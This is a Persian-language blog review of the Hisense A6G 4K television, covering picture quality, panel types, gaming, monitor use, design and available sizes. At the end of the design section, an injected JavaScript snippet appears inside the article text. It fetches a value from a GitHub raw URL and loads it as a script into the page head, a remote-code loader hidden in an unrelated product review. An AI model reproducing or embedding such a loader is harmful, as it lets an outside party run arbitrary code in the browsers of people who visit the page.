دسته‌بندی نشده

بررسی تلویزیون هایسنس مدل A6G

تلویزیون A6G هایسنس یک مدل کاملا ساده محسوب می شود. این تلویزیون در سری مدل های میان رده 4K فورکی می باشد. A6G در رنج گسترده ای از سایز های مختلف از 43 اینچ تا 85 اینچ ارائه می شود و ویژگی جالبی که در این تلویزیون دیده می شود این است که مشخصات ان در بین سایز های مختلف متفاوت می باشد. در این تلویزیون قابلیت لوکال دیمینگ وجود ندارد و یکنواختی مشکی نیز در حد متوسطی قرار دارد بنابراین انتخابی مناسب برای اتاق های تاریک نمی باشد. برخی از سایز های این تلویزیون دارای پنل VA هستند بنابراین به دلیل کنتراست بالایی که دارد عملکرد ان ها در اتاق های تاریک بهتر است. از طرفی دیگر تمامی سایز های این تلویزیون دارای پلتفرم اندروید هستند و تمامی ویژگی های تلویزیون های بالا رده را دارا می باشند. استفاده از این پلتفرم بسیار اسان است و با تعداد زیادی از اپلیکیشن ها ارائه می شود. در حالت گیمینگ این تلویزیون تاخیر ورودی بسیار پایینی دارد اما به دلیل پاسخگویی نه چندان خوبی که دارد برای استفاده به عنوان تلویزیون گیمینگ چندان کاربردی نیست. 

کارایی کلی

درکل مدل A6G هایسنس تلویزیونی خوب و مناسب محسوب می شود. زاویه دید گسترده این تلویزیون و کنترل انعکاس عالی که دارد این محصول را برای تماشا شو های تلویزیونی در طول روز کاملا مناسب و کاربردی می کند. البته ممکن است تلویزیون به حدی روشن نشود که برای استفاده در اتاق های بسیار روشن مناسب باشد. با وجود تاخیر ورودی پایینی که این تلویزیون دارد از نظر گیمینگ در حد متوسط قرار دارد. قابلیت های گیمینگ تلویزیون A6G هایسنس در حد متوسط قرار دارد. اگر می خواهید تلویزیون را در اتاق های تاریک برای تماشا فیلم استفاده کنید پنل های IPS انتخابی مناسب برایتان نیست چراکه پنل IPS نسبت کنتراست پایینی دارند و قابلیت local dimming و یکنواختی مشکی مناسب در ان ها وجود ندارد. 

فیلم ها 

تلویزیون A6G برای تماشا فیلم در اتاق های تاریک نا امید کننده است. این محصول نسبت کنتراست پایینی دارد و رنگ های مشکی روی ان به خاکستری نزدیک هستند. به دلیل عدم بهرمندی از قابلیت لوکال دیمینگ این ویژگی ها ارتقا پیدا نخواهند کرد. البته در سایز هایی که دارای پنل VA هستند این ویژگی ها متفاوت خواهد بود و نسبت کنتراست و یکنواختی مشکی در ان ها بالا می باشد. رزولوشن های پایین در این نمایشگر به خوبی ارتقا پیدا می کنند و لرزش های ان ها کاملا از بین خواهند رفت. 

برنامه های تلویزیونی

این تلویزیون بهترین انتخاب برای تماشا شو های تلویزیونی در طول روز می باشد. مانند تمام تلویزیون های دیگر با پنل IPS زاویه دید در این تلویزیون گسترده است و در قسمت های حاشیه ای ان تصاویر دقت و کیفیت خود را حفظ خواهند کرد. محتویات رزولوشن پایین در این تلویزیون به خوبی ارتقا می یابند بنابراین شو های قدیمی جلوه ای عالی خواهند داشت. از طریق گوگل پلی توکار این تلویزیون می توانید تعداد فراوانی از اپلیکیشن های مختلف را برای تماشا برنامه ها روی ان دانلود و اجرا کنید. به دلیل کنترل انعکاس خوبی که این تلویزیون دارد می توان به اسانی از ان در اتاق های نسبتا روشن استفاده کرد. 

مسابقات ورزشی

سری تلویزیون های A6G از هایسنس مناسب برای تماشا مسابقات ورزشی است. زاویه دید گسترده این تلویزیون امکان تماشا مسابقات بزرگ را با تعداد زیادی از افراد و دوستان نزدیک فراهم می سازد. بازی های انتقال یافته از طریق کابل به خوبی و بدون هیچگونه مشکلی ارتقا داده می شوند. در این تلویزیون تعداد زیادی از اپلیکیشن های ورزشی قابل اجرا است. 

بازی ها 

تلویزیون A6G هایسنس برای گیمینگ در حد متوسطی قرار دارد. پاسخدهی در این محصول پایین است بنابراین محتوا پر سرعت روی ان دچار تاری خواهد شد. قابلیت های گیمینگ دیگر مانند نرخ رفرش متغییر VRR در این تلویزیون پشتیبانی نمی شود اما در حالت بازی تاخیر ورودی بسیار پایینی دارد. در حالت گیمینگ کیفیت و کوالتی تصاویر تغییر نمی کند و بازی ها با کیفیت 4K فورکی روی ان اجرا می شوند. به دلیل کنتراست پایین این تلویزیون برای بازی در اتاق های تاریک پیشنهاد نمی شود. 

مانیتور کامپیوتر 

تلویزیون A6G بهترین انتخاب برای استفاده به عنوان مانیتور است. زاویه دید در این تلویزیون بالا است بنابراین در قسمت های حاشیه ای تصاویر با دقت بالا پخش می شود. تاخیر ورودی پایین پاسخگویی مناسب را برای حرکات تضمین می کند. به دلیل روشنایی نه چندان بالا نمایشگر این تلویزیون, نمی توان ان را در محیط های اداری و بسیار پر نور استفاده کرد اما در نور متوسط هیچ مشکل و ایرادی ندارند. 

طراحی و اینچ

سری A6 از هایسنس دیزاینی کاملا مشابه با U6G و U8G دارد. حاشیه های باریک و طراحی ظریف این تلویزیون بسیار زیبا و جذاب برای یک تلویزیون ارزان قیمت است. در سایز های بزرگ طراحی متفاوتی برای قسمت پشتی استفاده شده است که چندان مورد توجه قرار نمی گیرد. پایه های تلویزیون به مدل H6570G هایسنس نزدیک هستند و در دو حالت قابل تنظیم می باشند. این تلویزیون هایسنس با اینچ های مختلف کوچک و بسیار بزرگی ارائه می شود. کوچک ترین سایز این تلویزیون 43 اینچ است که می توان از ان به عنوان مانیتور استفاده کرد. 50,55 و 58 اینچ مناسب سالن های متوسط هستند و سایز های 60 و 65 اینچ را می توان در سالن های نسبتا بزرگ استفاده کرد. اندازه های 70 و 75 و 85 اینچ از این تلویزیون هایسنس را می توان در محیط های کاملا بزرگ با متراژ بالا بکار برد.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *